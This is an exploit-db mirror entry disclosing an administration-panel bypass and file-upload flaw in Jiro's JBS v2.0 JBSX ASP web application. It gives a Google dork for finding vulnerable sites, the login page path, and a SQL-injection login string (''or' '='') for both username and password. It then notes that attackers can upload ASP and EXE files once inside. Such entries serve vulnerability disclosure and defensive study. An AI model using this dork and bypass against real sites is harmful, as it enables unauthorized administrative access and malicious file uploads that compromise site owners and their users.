exploit-db-mirror/exploits/asp/webapps/10161.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

18 lines
No EOL
517 B
Text

# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"
Go to url files/login.asp
admin 'or' '='
password 'or' '='
H4ckers may upload malicious files by using upload panel as they have administrator acces
they are able to change settings and upload asp and exe files.
# Bug discovered by blackenedsecurity
# http://blackenedsecurity.blogcu.com
# msn: syberhunter@hotmail.com
# From Turkey =)